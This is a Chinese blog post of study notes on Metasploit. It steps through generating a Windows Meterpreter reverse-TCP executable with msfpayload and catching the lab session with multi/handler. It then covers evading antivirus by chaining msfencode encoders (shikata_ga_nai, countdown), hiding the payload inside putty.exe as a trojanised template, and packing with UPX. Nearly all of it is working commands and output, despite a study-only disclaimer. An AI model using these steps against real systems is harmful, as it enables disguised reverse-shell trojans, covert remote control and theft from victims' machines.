cstriker1407的笔记本

好记性不如铅笔头

安全, 操作系统

某《魔鬼训练营》读书笔记:msfpayload的使用及免杀工具

!!!笔记仅供学习交流使用,请勿进行其他用途!!!

msfpayload的使用方法:

使用msfpayload生成payload:

root@kali:~# msfpayload

    Usage: /opt/metasploit/apps/pro/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|Cs[H]arp|[P]erl|Rub[Y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar|Pytho[N]>

OPTIONS:

    -h        Help banner
    -l        List available payloads

#==>>参看可用的payload:
root@kali:~# msfpayload -l

Framework Payloads (335 total)
==============================

    Name                                             Description
    ----                                             -----------
。。。。。。
。。。。。。
#==>>使用某个payload,并且输入“O”(大写字母O)查看选项:
root@kali:~# msfpayload windows/meterpreter/reverse_tcp O

       Name: Windows Meterpreter (Reflective Injection), Reverse TCP Stager
     Module: payload/windows/meterpreter/reverse_tcp
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 287
       Rank: Normal

Provided by:
  skape <mmiller@hick.org>
  sf <stephen_fewer@harmonysecurity.com>
  hdm <hdm@metasploit.com>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
LHOST     10.10.10.130     yes       The listen address
LPORT     4444             yes       The listen port

Description:
  Connect back to the attacker, Inject the meterpreter server DLL via 
  the Reflective Dll Injection payload (staged)

#==>>LHOST和LPORT都是正确的,直接生成可执行文件
root@kali:~# msfpayload windows/meterpreter/reverse_tcp  X > test.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 287
Options: {"LHOST"=>"10.10.10.130"}

将该可执行文件上传到WinXPSP2中,然后进入msf中:

#==>>首先找到对应的模块
msf > search multi/handler

Matching Modules
================

   Name                                               Disclosure Date          Rank       Description
   ----                                               ---------------          ----       -----------
。。。。。。
   exploit/multi/handler                                                       manual     Generic Payload Handler
。。。。。。

msf > use  exploit/multi/handler
msf exploit(handler) > show payloads
。。。。。。
#==>>找到和生成exe文件相对应的payload
msf exploit(handler) >  set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) >show options  #==>>查看,修改选项

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set LHOST 10.10.10.130
LHOST => 10.10.10.130
msf exploit(handler) > exploit
#==>>msf开始监听后,就可以在XP中执行test.exe文件,就会发现渗透成功了

[*] Started reverse handler on 10.10.10.130:4444 
[*] Starting the payload handler...
[*] Sending stage (769536 bytes) to 10.10.10.132
[*] Meterpreter session 1 opened (10.10.10.130:4444 -> 10.10.10.132:1047) at 2014-05-12 17:44:06 +0800
meterpreter > #==>>渗透成功

我们用msfpayload直接生成的payload非常容易被检测为木马,这里需要进行下免杀处理。先笔记个网址【 https://www.virustotal.com/zh-cn 】,可以在线检测木马。

msfencode:

root@kali:~/payloadtest# msfencode -h

    Usage: /opt/metasploit/apps/pro/msf3/msfencode <options>

OPTIONS:

    -a <opt>  The architecture to encode as
    -b <opt>  The list of characters to avoid: '\x00\xff'
    -c <opt>  The number of times to encode the data
    -d <opt>  Specify the directory in which to look for EXE templates
    -e <opt>  The encoder to use
    -h        Help banner
    -i <opt>  Encode the contents of the supplied file path
    -k        Keep template working; run payload in new thread (use with -x)
    -l        List available encoders
    -m <opt>  Specifies an additional module search path
    -n        Dump encoder information
    -o <opt>  The output file
    -p <opt>  The platform to encode for
    -s <opt>  The maximum size of the encoded data
    -t <opt>  The output format: bash,c,csharp,dw,dword,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,dll,elf,exe,exe-only,exe-service,exe-small,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-net,psh-reflection,vba,vba-exe,vbs,war
    -v        Increase verbosity
    -x <opt>  Specify an alternate executable template

#==>>可用的编码器
root@kali:~/payloadtest# msfencode -l

Framework Encoders
==================

    Name                          Rank       Description
    ----                          ----       -----------
    cmd/generic_sh                good       Generic Shell Variable Substitution Command Encoder
    cmd/ifs                       low        Generic ${IFS} Substitution Command Encoder
    cmd/powershell_base64         excellent  Powershell Base64 Command Encoder
    cmd/printf_php_mq             manual     printf(1) via PHP magic_quotes Utility Command Encoder
    generic/eicar                 manual     The EICAR Encoder
    generic/none                  normal     The "none" Encoder
    mipsbe/byte_xori              normal     Byte XORi Encoder
    mipsbe/longxor                normal     XOR Encoder
    mipsle/byte_xori              normal     Byte XORi Encoder
    mipsle/longxor                normal     XOR Encoder
    php/base64                    great      PHP Base64 Encoder
    ppc/longxor                   normal     PPC LongXOR Encoder
    ppc/longxor_tag               normal     PPC LongXOR Encoder
    sparc/longxor_tag             normal     SPARC DWORD XOR Encoder
    x64/xor                       normal     XOR Encoder
    x86/add_sub                   manual     Add/Sub Encoder
    x86/alpha_mixed               low        Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper               low        Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_underscore_tolower  manual     Avoid underscore/tolower
    x86/avoid_utf8_tolower        manual     Avoid UTF8/tolower
    x86/bloxor                    manual     BloXor - A Metamorphic Block Based XOR Encoder
    x86/call4_dword_xor           normal     Call+4 Dword XOR Encoder
    x86/context_cpuid             manual     CPUID-based Context Keyed Payload Encoder
    x86/context_stat              manual     stat(2)-based Context Keyed Payload Encoder
    x86/context_time              manual     time(2)-based Context Keyed Payload Encoder
    x86/countdown                 normal     Single-byte XOR Countdown Encoder
    x86/fnstenv_mov               normal     Variable-length Fnstenv/mov Dword XOR Encoder
    x86/jmp_call_additive         normal     Jump/Call XOR Additive Feedback Encoder
    x86/nonalpha                  low        Non-Alpha Encoder
    x86/nonupper                  low        Non-Upper Encoder
    x86/opt_sub                   manual     Sub Encoder (optimised)
    x86/shikata_ga_nai            excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit         manual     Single Static Bit
    x86/unicode_mixed             manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper             manual     Alpha2 Alphanumeric Unicode Uppercase Encoder

简单的使用实例:

#==>>使用msfpayload生成payload,使用R关键字输出原始数据,然后通过管道符号| 送到msfencode中,msfencode使用shikata_ga_nai编码一次,输出exe文件格式,输出名称为test2.exe
root@kali:~/payloadtest# msfpayload windows/meterpreter/reverse_tcp R | msfencode -e x86/shikata_ga_nai -c 1 -t exe -o test2.exe
[*] x86/shikata_ga_nai succeeded with size 314 (iteration=1)

#==>>使用msfpayload生成payload,使用R关键字输出原始数据,将原始数据保存在test.raw文件中,msfencode使用shikata_ga_nai编码一次,输出exe文件格式,输入数据来自test.raw,输出名称为test2.exe
root@kali:~/payloadtest# msfpayload windows/meterpreter/reverse_tcp R > test.raw
root@kali:~/payloadtest# msfencode -e x86/shikata_ga_nai -c 1 -t exe -i test.raw -o test3.exe
[*] x86/shikata_ga_nai succeeded with size 314 (iteration=1)

#==>>msfencode使用shikata_ga_nai编码一次,输出原始数据,输入数据来自test.raw,然后将输出的原始数据通过管道符号再次送到msfencode中,这里在使用countdown编码一次,输出exe文件格式,输出名称为test4.exe
root@kali:~/payloadtest# msfencode -e x86/shikata_ga_nai -c 1  -i test.raw  -t raw | msfencode -e x86/countdown -c 1 -t exe -o test4.exe
[*] x86/shikata_ga_nai succeeded with size 314 (iteration=1)

[*] x86/countdown succeeded with size 332 (iteration=1)

#==>>msfencode使用shikata_ga_nai编码一次,输出exe文件格式,输入数据来自test.raw,输出名称为sickputty.exe,不使用默认的编码模板,使用putty.exe作为编码模板(-x 选项),同时生成的sickputty.exe执行时依然可以运行putty(-k选项)
root@kali:~/payloadtest# msfencode -e x86/shikata_ga_nai -c 1 -t exe -i test.raw -o sickputty.exe -x ./putty.exe -k
[*] x86/shikata_ga_nai succeeded with size 314 (iteration=1)

UPX:

root@kali:~/payloadtest# upx
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2011
UPX 3.08        Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011

Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..

Commands:
  -1     compress faster                   -9    compress better
  -d     decompress                        -l    list compressed file
  -t     test compressed file              -V    display version number
  -h     give more help                    -L    display software license
Options:
  -q     be quiet                          -v    be verbose
  -oFILE write output to 'FILE'
  -f     force compression of suspicious files
  -k     keep backup files
file..   executables to (de)compress

Type 'upx --help' for more detailed help.

UPX comes with ABSOLUTELY NO WARRANTY; for details visit http://upx.sf.net
root@kali:~/payloadtest# upx -h
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2011
UPX 3.08        Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011

Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..

Commands:
  -1     compress faster                   -9    compress better
  --best compress best (can be slow for big files)
  -d     decompress                        -l    list compressed file
  -t     test compressed file              -V    display version number
  -h     give this help                    -L    display software license

Options:
  -q     be quiet                          -v    be verbose
  -oFILE write output to 'FILE'
  -f     force compression of suspicious files
  --no-color, --mono, --color, --no-progress   change look

Compression tuning options:
  --brute             try all available compression methods & filters [slow]
  --ultra-brute       try even more compression variants [very slow]

Backup options:
  -k, --backup        keep backup files
  --no-backup         no backup files [default]

Overlay options:
  --overlay=copy      copy any extra data attached to the file [default]
  --overlay=strip     strip any extra data attached to the file [DANGEROUS]
  --overlay=skip      don't compress a file with an overlay

Options for djgpp2/coff:
  --coff              produce COFF output [default: EXE]

Options for dos/com:
  --8086              make compressed com work on any 8086

Options for dos/exe:
  --8086              make compressed exe work on any 8086
  --no-reloc          put no relocations in to the exe header

Options for dos/sys:
  --8086              make compressed sys work on any 8086

Options for ps1/exe:
  --8-bit             uses 8 bit size compression [default: 32 bit]
  --8mib-ram          8 megabyte memory limit [default: 2 MiB]
  --boot-only         disables client/host transfer compatibility
  --no-align          don't align to 2048 bytes [enables: --console-run]

Options for watcom/le:
  --le                produce LE output [default: EXE]

Options for win32/pe, rtm32/pe & arm/pe:
  --compress-exports=0    do not compress the export section
  --compress-exports=1    compress the export section [default]
  --compress-icons=0      do not compress any icons
  --compress-icons=1      compress all but the first icon
  --compress-icons=2      compress all but the first icon directory [default]
  --compress-icons=3      compress all icons
  --compress-resources=0  do not compress any resources at all
  --keep-resource=list    do not compress resources specified by list
  --strip-relocs=0        do not strip relocations
  --strip-relocs=1        strip relocations [default]

file..   executables to (de)compress

This version supports:
    AMD64-darwin.macho               Mach/AMD64
    ARMEL-darwin.macho               Mach/ARMEL
    amd64-linux.elf                  linux/ElfAMD
    amd64-linux.kernel.vmlinux       vmlinux/AMD64
    arm-linux.elf                    linux/armel
    arm-linux.kernel.vmlinux         vmlinux/armel
    arm-wince.pe                     arm/pe
    armeb-linux.elf                  linux/armeb
    armeb-linux.kernel.vmlinux       vmlinux/armeb
    armel-linux.kernel.vmlinuz       vmlinuz/armel
    fat-darwin.macho                 Mach/fat
    i086-dos16.com                   dos/com
    i086-dos16.exe                   dos/exe
    i086-dos16.sys                   dos/sys
    i386-bsd.elf.execve              BSD/386
    i386-darwin.macho                Mach/i386
    i386-dos32.djgpp2.coff           djgpp2/coff
    i386-dos32.tmt.adam              tmt/adam
    i386-dos32.watcom.le             watcom/le
    i386-freebsd.elf                 BSD/elf386
    i386-linux.elf                   linux/elf386
    i386-linux.elf.execve            linux/386
    i386-linux.elf.shell             linux/sh386
    i386-linux.kernel.bvmlinuz       bvmlinuz/386
    i386-linux.kernel.vmlinux        vmlinux/386
    i386-linux.kernel.vmlinuz        vmlinuz/386
    i386-netbsd.elf                  netbsd/elf386
    i386-openbsd.elf                 opnbsd/elf386
    i386-win32.pe                    win32/pe
    m68k-atari.tos                   atari/tos
    mips-linux.elf                   linux/mipseb
    mipsel-linux.elf                 linux/mipsel
    mipsel.r3000-ps1                 ps1/exe
    powerpc-darwin.macho             Mach/ppc32
    powerpc-linux.elf                linux/ElfPPC
    powerpc-linux.kernel.vmlinux     vmlinux/ppc32

UPX comes with ABSOLUTELY NO WARRANTY; for details visit http://upx.sf.net
root@kali:~/payloadtest# 

简单的使用实例:

#==>>使用压缩等级为5,进行压缩test4.exe
root@kali:~/payloadtest# upx -5 test4.exe 
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2011
UPX 3.08        Markus Oberhumer, Laszlo Molnar & John Reiser   Dec 12th 2011

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     73802 ->     48128   65.21%    win32/pe     test4.exe                     

Packed 1 file.

其他参考链接:

http://www.offensive-security.com/metasploit-unleashed/Msfpayload 】

Leave a Reply

3 + 20 =

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据

Theme by Anders Norén

苏ICP备16032087号